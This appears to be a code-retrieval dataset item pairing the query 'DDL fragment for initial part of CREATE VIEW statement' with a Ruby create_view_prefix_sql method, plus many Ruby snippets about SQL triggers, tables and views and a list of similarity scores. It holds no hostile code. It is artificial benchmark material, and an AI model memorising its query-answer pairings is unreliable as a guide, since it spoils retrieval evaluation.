"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def after_create(record)\n contents = to_sql_insert(record)\n to_logfile(contents)\n # Send a notification to the admin, if requested:\n if @email_on_create\n AgexMailer.action_notify_mail(\n record.respond_to?(:user) ? record.user : nil,\n \"#{@table_name} row CREATED\",\n contents\n ).deliver\n end\n end",
"def alter(field)\n sql = build_sql(field)\n execute(sql)\nend",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def on_db_vuln(vuln)\n\tend",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def trigger_kind\n attributes.fetch(:triggerKind)\n end",
"def trigger_kind\n attributes.fetch(:triggerKind)\n end",
"def create_build_trigger request_pb, options = nil\n raise ::ArgumentError, \"request must be provided\" if request_pb.nil?\n\n verb, uri, query_string_params, body = ServiceStub.transcode_create_build_trigger_request request_pb\n query_string_params = if query_string_params.any?\n query_string_params.to_h { |p| p.split \"=\", 2 }\n else\n {}\n end\n\n response = @client_stub.make_http_request(\n verb,\n uri: uri,\n body: body || \"\",\n params: query_string_params,\n options: options\n )\n operation = ::Gapic::Rest::TransportOperation.new response\n result = ::Google::Cloud::Build::V1::BuildTrigger.decode_json response.body, ignore_unknown_fields: true\n\n yield result, operation if block_given?\n result\n end",
"def add_trigger(condition, name=nil, &action)\n trigger = com.ardor3d.input.logical.InputTrigger.new(condition, &action)\n trigger.set_id(name) if name\n logical.registerTrigger(trigger)\n trigger\n end",
"def create_pt_heartbeat_hint\n exec_cmd(\"CREATE DATABASE IF NOT EXISTS start_pt_heartbeat\")\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def synchronizedTriggers _args\n \"synchronizedTriggers _args;\" \n end",
"def generate_migration_body(tables)\n current_tables, new_tables = table_names(tables).partition do |table_name| \n @db_table_names.include?(table_name)\n end\n\n add_line \"change do\"\n create_new_tables(new_tables, tables)\n alter_tables(current_tables, tables)\n add_line \"end\"\n end",
"def create_trigger(hook_id:, project_id:, trigger_body:)\n url = \"#{@base_url}/vapid/webhooks/hooks/#{hook_id}/triggers?project_id=#{project_id}\"\n res = HTTParty.post(url, body: trigger_body.to_json, headers: procore_headers(token: @customer_info[:token], company_id: @customer_info[:company_id]) ) # returns HTTParty object {code, response}\n if res.code == 201\n res\n else\n raise StandardError.new({message: 'Error Creating Hook', data: res})\n end \n end",
"def create_sequence_statement(repository, property)\n \"CREATE SEQUENCE #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def create_sql(from_id, to_id)\n <<~SQL\n WITH created_records AS #{Gitlab::Database::AsWithMaterialized.materialized_if_supported} (\n INSERT INTO services (project_id, #{DEFAULTS.keys.map { |key| %(\"#{key}\")}.join(',')}, created_at, updated_at)\n #{select_insert_values_sql(from_id, to_id)}\n RETURNING *\n )\n SELECT COUNT(*) as number_of_created_records\n FROM created_records\n SQL\n end",
"def create_member_trigger(group_member_info)\n ret = http_post 'triggers/groups/members', group_member_info.to_h\n Trigger.new(ret)\n end",
"def raw_sql(record)\n record.class.arel_table.create_insert.tap do |insert_manager|\n insert_manager.insert(insert_values(record))\n end.to_sql\n end",
"def replication_trigger_exists?(trigger_name, table_name)\n !select_all(\"select 1 from information_schema.triggers where trigger_schema = database() and trigger_name = '#{trigger_name}_insert' and event_object_table = '#{table_name}'\").empty?\n end",
"def trigger_exists?(table_name, trigger_name)\n triggers(table_name).detect { |i| i.name == trigger_name }\n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend"
] |
[
"0.7504239",
"0.7398713",
"0.71695596",
"0.716204",
"0.69328403",
"0.6909614",
"0.6909614",
"0.68390316",
"0.6784707",
"0.65625846",
"0.62844837",
"0.6207567",
"0.6205865",
"0.6203629",
"0.6160155",
"0.6159027",
"0.60619485",
"0.6052486",
"0.6001266",
"0.59768575",
"0.5899913",
"0.58506125",
"0.57457817",
"0.57381433",
"0.5727514",
"0.57000446",
"0.565338",
"0.5648798",
"0.56444323",
"0.5637746",
"0.5635928",
"0.56316155",
"0.5623096",
"0.5547945",
"0.55458313",
"0.55048275",
"0.5477467",
"0.5466842",
"0.5415819",
"0.539012",
"0.5386233",
"0.53694844",
"0.5349302",
"0.53474",
"0.53414464",
"0.5331691",
"0.52772063",
"0.5274943",
"0.5272027",
"0.52698845",
"0.52678216",
"0.5263491",
"0.52624005",
"0.5257083",
"0.5248272",
"0.52447516",
"0.52423215",
"0.52230453",
"0.52171797",
"0.5214975",
"0.5212365",
"0.5191404",
"0.519122",
"0.5189333",
"0.5179841",
"0.51785856",
"0.5172144",
"0.51708233",
"0.51673776",
"0.5139923",
"0.51291376",
"0.5126428",
"0.5123939",
"0.5117739",
"0.51153904",
"0.51149863",
"0.50941265",
"0.50792444",
"0.50737983",
"0.50737983",
"0.5069237",
"0.50675154",
"0.50606865",
"0.5049591",
"0.5039414",
"0.5039414",
"0.50375396",
"0.50372833",
"0.50359464",
"0.5027749",
"0.501772",
"0.50162876",
"0.5015376",
"0.5013185",
"0.50051665",
"0.5001096",
"0.49929312",
"0.49900317",
"0.49895212",
"0.4978154"
] |
0.73837554
|
2
|
DDL fragment for initial part of CREATE VIEW statement
|
def create_view_prefix_sql(name, options)
sql = create_view_sql_append_columns("CREATE #{'OR REPLACE 'if options[:replace]}#{'TEMPORARY 'if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}", options[:columns] || options[:recursive])
if options[:security_invoker]
sql += " WITH (security_invoker)"
end
if tablespace = options[:tablespace]
sql += " TABLESPACE #{quote_identifier(tablespace)}"
end
sql
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def create_view(name, source)\n source = source.sql if source.is_a?(Dataset)\n execute(\"CREATE VIEW #{name} AS #{source}\")\n end",
"def create_view_sql(name, source, options)\n source = source.sql if source.is_a?(Dataset)\n sql = String.new\n sql << \"#{create_view_prefix_sql(name, options)} AS #{source}\"\n if check = options[:check]\n sql << \" WITH#{' LOCAL' if check == :local} CHECK OPTION\"\n end\n sql\n end",
"def create_view(view_name, definition, options={})\n SchemaMonkey::Middleware::Migration::CreateView.start(connection: self, view_name: view_name, definition: definition, options: options) do |env|\n definition = env.definition\n view_name = env.view_name\n options = env.options\n definition = definition.to_sql if definition.respond_to? :to_sql\n\n if options[:materialized] && options[:allow_replace]\n raise ArgumentError, 'allow_replace is not supported for materialized views'\n end\n\n if options[:force]\n drop_view(view_name, {if_exists: true}.merge(options.slice(:materialized)))\n end\n\n command = if options[:materialized]\n \"CREATE MATERIALIZED\"\n elsif options[:allow_replace]\n \"CREATE OR REPLACE\"\n else\n \"CREATE\"\n end\n\n execute \"#{command} VIEW #{quote_table_name(view_name)} AS #{definition}\"\n end\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def write_view_definition(stream, table_schema, table_name, view_definition)\n stream << \" create_view \\\"#{table_schema}.#{table_name}\\\", <<-SQL\\n\" \\\n \" #{view_definition}\\n\" \\\n \" SQL\\n\"\n end",
"def write_foods_view()\n puts <<SQL\nDROP VIEW IF EXISTS foods;\n\nCREATE VIEW foods AS\nSELECT food_description.id, food_description.description,\n nutrient_data.nutrient_value AS kcal,\n food_group.description AS food_group,\n food_description.refuse_percentage, food_description.refuse_description\n FROM food_description, nutrient_definition, nutrient_data, food_group\n WHERE food_description.id = nutrient_data.food_id\n AND food_group.id = food_description.food_group_id\n AND nutrient_definition.id = nutrient_data.nutrient_id\n AND nutrient_definition.id = '208'\n AND food_group.id NOT IN ('0300', '2100', '2200', '3600');\nSQL\nend",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def create_or_replace_view(name, source)\n source = source.sql if source.is_a?(Dataset)\n execute(\"CREATE OR REPLACE VIEW #{name} AS #{source}\")\n end",
"def create_view(name, source, options = OPTS)\n execute_ddl(create_view_sql(name, source, options))\n remove_cached_schema(name)\n nil\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def create_view(name, body = nil, force: false, **kwargs, &block)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n drop_view(name) if force && table_exists?(name)\n\n execute build_create_view_query(name, body, **kwargs, &block)\n end",
"def view_select_statement(view, name=nil)\n q =<<-ENDSQL\n SELECT\n SM.definition\n FROM\n sys.objects O\n JOIN\n sys.sql_modules SM ON o.object_id = SM.object_id\n WHERE\n o.type = 'V' AND o.name = '#{view}'\n ENDSQL\n \n view_def = select_value(q, name)\n \n if view_def\n return convert_statement(view_def)\n else\n raise \"No view called #{view} found\"\n end\n end",
"def create_view_sql_append_columns(sql, columns)\n if columns\n sql += ' ('\n schema_utility_dataset.send(:identifier_list_append, sql, columns)\n sql << ')'\n end\n sql\n end",
"def create_view table_id, query, name: nil, description: nil\n options = { query: query, name: name, description: description }\n insert_table table_id, options\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def create_materialized_view(name, body = nil, force: false, **kwargs, &block)\n supports_materialized_view!\n\n drop_materialized_view(name) if force && table_exists?(name)\n\n execute build_create_materialized_view_query(name, body, **kwargs, &block)\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def create_or_replace_view(name, source, options = OPTS)\n if supports_create_or_replace_view?\n options = options.merge(:replace=>true)\n else\n swallow_database_error{drop_view(name)}\n end\n\n create_view(name, source, options)\n nil\n end",
"def view_select_statement(view, name=nil)\n row = execute(\"SELECT VIEW_DEFINITION FROM SYSIBM.VIEWS WHERE TABLE_NAME = '#{view}'\", name).each do |row|\n return row[0]\n end\n raise \"No view called #{view} found\"\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def migration_set_attribs\n tcs = table_comments || {}\n\n if view_sql&.strip&.present?\n view_sql_text = <<~VSTEXT\n self.view_sql = <<~VIEWSQL\n #{view_sql}\n VIEWSQL\n VSTEXT\n end\n\n <<~SETATTRIBS\n self.schema = '#{db_migration_schema}'\n self.table_name = '#{table_name}'\n self.class_name = '#{class_name}'\n self.fields = %i[#{migration_fields_array.join(' ')}]\n self.table_comment = '#{tcs[:table]}'\n self.fields_comments = #{(tcs[:fields] || {}).to_h}\n self.db_configs = #{(db_configs || {}).to_h}\n self.no_master_association = #{!!no_master_association}\n self.resource_type = :#{resource_type}\n self.all_referenced_tables = #{(all_referenced_tables || []).to_a}\n #{view_sql_text}\n SETATTRIBS\n end",
"def cd_id_table\n view_name = cd_id_table_tn\n if @cd_id_table_tn_exists.nil?\n @cd_id_table_tn_exists=true\n if !$db.table_exists?(view_name)\n $db.run(\"CREATE VIEW #{view_name} AS SELECT DISTINCT(r.canonical_document_id) FROM records r INNER JOIN records_searches br ON r.id=br.record_id INNER JOIN searches b ON br.search_id=b.id WHERE b.systematic_review_id=#{self[:id]} AND b.valid=1\n\n UNION\n\n SELECT DISTINCT r.canonical_document_id FROM searches b INNER JOIN records_searches br ON b.id=br.search_id INNER JOIN records_references rr ON br.record_id=rr.record_id INNER JOIN bib_references r ON rr.reference_id=r.id WHERE b.systematic_review_id=#{self[:id]} and r.canonical_document_id IS NOT NULL and b.valid=1 GROUP BY r.canonical_document_id\")\n end\n end\n $db[view_name.to_sym]\n end",
"def migration_update_view\n _added, _removed, _changed, prev_fields = field_changes\n\n if table_comments\n new_table_comment = table_comment_changes\n new_fields_comments = fields_comments_changes\n end\n\n new_fields_comments ||= {}\n\n <<~ARCONTENT\n #{table_name_changed ? \" self.prev_table_name = '#{prev_table_name}'\" : ''}\n #{table_name_changed ? ' update_table_name' : ''}\n self.prev_fields = %i[#{prev_fields.join(' ')}]\n #{new_table_comment ? \" \\# new table comment: #{new_table_comment.gsub(\"\\n\", '\\n')}\" : ''}\n #{new_fields_comments.present? ? \" \\# new fields comments: #{new_fields_comments.keys}\" : ''}\n create_or_update_dynamic_model_view\n ARCONTENT\n end",
"def tableView(aView, validateDrop:info, proposedRow:row, proposedDropOperation:op)\n NSDragOperationEvery\n end",
"def create_view(view, cspec)\n\tKernel.system(\"perl #{$scripts}/ct-mkview.pl -raw -name #{view} -dynamic -spec #{cspec}\")\n\treturn $? == 0\nend",
"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def views(stream)\n # Don't create \"system\" views.\n view_names = PgSaurus::Tools.views\n view_names.each do |options|\n write_view_definition(stream,\n options[\"table_schema\"],\n options[\"table_name\"],\n options[\"view_definition\"])\n end\n stream << \"\\n\"\n end",
"def drop_materialized_view(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP MATERIALIZED VIEW '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |v| quote_view_name(v) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def view(name, opts = {})\n design_doc.create_view(name, opts)\n end",
"def views(opts=OPTS)\n relkind = opts[:materialized] ? 'm' : 'v'\n pg_class_relname(relkind, opts)\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def view_select_statement(view, name=nil)\n raise NotImplementedError, \"view_select_statement is an abstract method\"\n end",
"def create_extension_view_and_class\n self.const_get(\"Extended#{to_s}\")\n rescue\n clause = view_builder\n #this needs to be moved into the specific db adapter files\n connection.execute %{\n create or replace algorithm = merge SQL SECURITY DEFINER view #{extended_table_name} as select #{clause[:view_select]} from #{table_name} #{clause[:view_joins]}#{clause[:view_conditions]}\n }\n class_eval %{\n class Extended#{to_s} < #{to_s}\n set_table_name \"#{extended_table_name}\"\n def self.descends_from_active_record?\n true\n end\n end\n }\n true\n end",
"def table_or_view\n return unless Admin::MigrationGenerator.table_or_view_exists? table_name\n\n return :table if Admin::MigrationGenerator.table_exists? table_name\n\n :view\n end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def views(opts=OPTS, &block)\n tables_or_views('VIEW', opts, &block)\n end",
"def drop_materialized_view(name, **kwargs)\n supports_materialized_view!\n\n execute build_drop_materialized_view_query(name, **kwargs)\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def alter_materialized_view_owner(name, role, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :owner_to => role\n }, options).to_sql\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def create_view(id,doc)\n resp = get_design_doc(id)\n ddoc = set_views(resp,doc)\n\n create_design_doc(id,ddoc)\n end",
"def show_create_table(db, table)\n end",
"def parse_ddl(name, &block) \n Rubyrel::DDL.schema(name, &block)\n end",
"def define(design_doc, name, opts = {})\n model = design_doc.model\n\n # Is this an all view?\n if name.to_s == 'all'\n opts[:map] = <<-EOF\n function(doc) {\n if (doc['#{model.model_type_key}'] == '#{model.to_s}') {\n emit(doc._id, null);\n }\n }\n EOF\n elsif !opts[:map]\n if opts[:by].nil? && name.to_s =~ /^by_(.+)/\n opts[:by] = $1.split(/_and_/)\n end\n raise \"View cannot be created without recognised name, :map or :by options\" if opts[:by].nil?\n\n opts[:allow_blank] = opts[:allow_blank].nil? ? true : opts[:allow_blank]\n opts[:guards] ||= []\n opts[:guards].push \"(doc['#{model.model_type_key}'] == '#{model.to_s}')\"\n\n keys = opts[:by].map{|o| \"doc['#{o}']\"}\n emit = keys.length == 1 ? keys.first : \"[#{keys.join(', ')}]\"\n opts[:guards] += keys.map{|k| \"(#{k} != null)\"} unless opts[:allow_nil]\n opts[:guards] += keys.map{|k| \"(#{k} != '')\"} unless opts[:allow_blank]\n opts[:map] = <<-EOF\n function(doc) {\n if (#{opts[:guards].join(' && ')}) {\n emit(#{emit}, 1);\n }\n }\n EOF\n if opts[:reduce].nil?\n # Use built-in sum function by default\n opts[:reduce] = \"_sum\"\n end\n end\n\n if opts[:reduce].is_a?(Symbol)\n # Assume calling a built in method, convert to a string\n opts[:reduce] = \"_#{opts[:reduce]}\"\n end\n\n design_doc['views'] ||= {}\n view = design_doc['views'][name.to_s] = { }\n view['map'] = opts[:map]\n view['reduce'] = opts[:reduce] if opts[:reduce]\n view\n end",
"def create_view(name, opts = {})\n Designs::View.define_and_create(self, name, opts)\n end",
"def create_tbilisi_districts(month)\n vl_name = \"#{@year} #{month} voters list\"\n view_name = \"#{vl_name} - #{@shapes[:tbilisi_district]}\"\n @client.query(\"drop view if exists `#{view_name}`\")\n sql = \"create view `#{view_name}` as\n select `region` AS `region`,\n `district_id` AS `district_id`,\n `district_name` AS `district_name`,\n avg(`avg_age`) AS `avg_age`,\n sum(`greater_99`) AS `greater_99`,\n sum(`85_99`) AS `85_99`,\n sum(`less_than_85`) AS `less_than_85`,\n sum(`no_birthdate`) AS `no_birthdate`,\n sum(`total_voters`) AS `total_voters`,\n sum(`duplicates`) AS `duplicates`\n from `#{vl_name} - raw`\n where (`district_id` between 1 and 22)\n group by `region`, `district_id`, `district_name`\n order by `district_id`\"\n\n results = @client.query(sql)\nend",
"def create_view(db)\n begin\n db.get('_design/todos')\n rescue RestClient::ResourceNotFound => nfe\n db.save_doc({\n \"_id\" => \"_design/todos\",\n :views => {\n :allTodos => {\n :reduce => \"_count\",\n :map => \"function(doc){if(doc.name != null){emit(doc.order,{name: doc.name})}}\"\n }\n }\n })\n end\n end",
"def finviz_view_type\n 411\n end",
"def overview(db)\n\toverview = db.execute(\"CREATE VIEW [Your top books!] AS SELECT book_name, author FROM books where rating > 3\")\n\treturn overview\nend",
"def test_materialized_view_metadata_drop\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n\n @session.execute(\"DROP MATERIALIZED VIEW simplex.mv1\")\n @cluster.refresh_schema\n refute @cluster.keyspace('simplex').has_materialized_view?('mv1')\n end",
"def view(ddoc,view,*opts)\n q = \"#{database}/_design/#{ddoc}/_view/#{view}\"\n q << build_query_string(opts.first,\"view\") if opts && opts.any? && opts.first.is_a?(Hash)\n\n @conn.query({url_path: q, method: :get})\n end",
"def drop_views name, defs=nil\n defs = defs.delete(:dependent_views) if defs.is_a?(Hash)\n defs.each do |dependent_view|\n execute \"DROP VIEW IF EXISTS #{dependent_view}\"\n end if defs\n \n execute \"DROP VIEW IF EXISTS #{name}\"\n\n end",
"def scaffold_name_sql\n scaffold_auto_complete_options[:sql_name]\n end",
"def materialize_view(name, sql)\n unless @enduser\n raise Empire::MissingEnduserError.new\n end\n path = \"view/#{name}\"\n data = {'query' => sql}\n request path, :put, {}, data\n end",
"def view_name=(view_name)\n Domgen.error(\"sql.view_name= invoked on entity #{entity.qualified_name} with no subtypes\") if entity.direct_subtypes.size == 0\n @view_name = view_name\n end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_view(view_name, map_function, reduce_function = nil)\n design_doc = database.get \"_design/#{self.name.underscore}\" rescue nil\n if design_doc\n design_doc[\"views\"][view_name] = {:map => map_function, :reduce => reduce_function}\n else\n design_doc = {\n \"_id\" => \"_design/#{self.name.underscore}\",\n :views => {\n view_name => {\n :map => map_function,\n :reduce => reduce_function\n }\n }\n }\n end\n database.save(design_doc)\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def create_full_rst_tbl(preserve_null_pk = true)\n unless defined? @full_rst_tbl\n self.all_cols_select\n self.pk_full_list\n if preserve_null_pk\n renamed_pk_col = @pk_full_list.map { |pk| \"#{pk['col']} as #{pk['alias']}_pk\" }.join(', ')\n else\n renamed_pk_col = @pk_full_list.map do |pk|\n pkcol = @all_cols.find{|col| col.colname == pk['colname'] and col.relname==pk['relname']}\n \"COALESCE(#{pk['col']},#{pkcol.null_replacement}) as #{pk['alias']}_pk\"\n end.join(',')\n end\n targetListReplacement = \"#{renamed_pk_col},#{@all_cols_select}\"\n query = ReverseParseTree.reverseAndreplace(@parseTree, targetListReplacement, '')\n @full_rst_tbl = \"#{@table}_full_rst\"\n pk = @pk_full_list.map { |pk| \"#{pk['alias']}_pk\" }.join(', ')\n # binding.pry\n DBConn.tblCreation(@full_rst_tbl, pk, query)\n\n # unless preserve_null_pk\n # DBConn.update_null_columns(@full_rst_tbl,pk)\n # end\n # if is_plain_query()\n # query = QueryBuilder.create_tbl(@full_rst_tbl, pk, query)\n # DBConn.exec(query)\n # else\n # query = QueryBuilder.create_tbl(@full_rst_tbl, '', query)\n # DBConn.exec(query)\n\n # # not_null_query = pk_list.flat.map{|pk| \"#{pk} is not null\"}.join(' AND ')\n # # add index on not null columns\n # pk_not_null = @pk_full_list.map { |pk| \"#{pk['alias']}_pk is not null\"}.join(' OR ')\n # create_indx = \"CREATE UNIQUE INDEX idx_#{@full_rst_tbl} on #{@full_rst_tbl} (#{pk}) where #{pk_not_null}\"\n # pp create_indx\n # DBConn.exec(create_indx)\n\n # end\n end\n return @full_rst_tbl\n end",
"def compile!(view); end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def migration\n migration_template 'migration.rb', 'db/migrate/create_seo_landing_pages.rb'\n end",
"def drop_view(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n names.each do |n|\n execute_ddl(drop_view_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def generate_views\n Views.new(cli: cli, app_path: app_path).generate\n end",
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def migration_template\n 'rails31_migration.rb.erb'\n end",
"def define_view\n \t#puts \"#{controller_name}.define_view:begin view=#{@myparams[:view_id]}\"\n \t# views: liste des vues possibles est utilisee dans la view ruby show\n\t\t@views = View.all\n\t\t# view_id: id de la vue selectionnee est utilisee dans la view ruby show\n\t\t#@myparams[:view_id] = @views.first.id if @myparams[:view_id].nil?\n\t\tif @myparams[:view_id].nil?\n\t\t\tif logged_in?\n\t\t\t@myparams[:view_id] = current_user.get_default_view.id\n\t\t\tend\n\t\tend\n\t\t#puts \"#{controller_name}.define_view:end view=#{@myparams[:view_id]}\"\n\tend",
"def generate_view_models\n file_name = class_name.underscore\n \n create_model class_name, file_name\n \n create_views file_name if options.views.present?\n end",
"def generate_migration_body(tables)\n current_tables, new_tables = table_names(tables).partition do |table_name| \n @db_table_names.include?(table_name)\n end\n\n add_line \"change do\"\n create_new_tables(new_tables, tables)\n alter_tables(current_tables, tables)\n add_line \"end\"\n end",
"def create_analysis_views\n puts \"====================\"\n puts \"creating analysis views for #{self.name}\"\n puts \"====================\"\n\n run_analysis_views\n\n puts \"> done\"\n puts \"====================\"\n end",
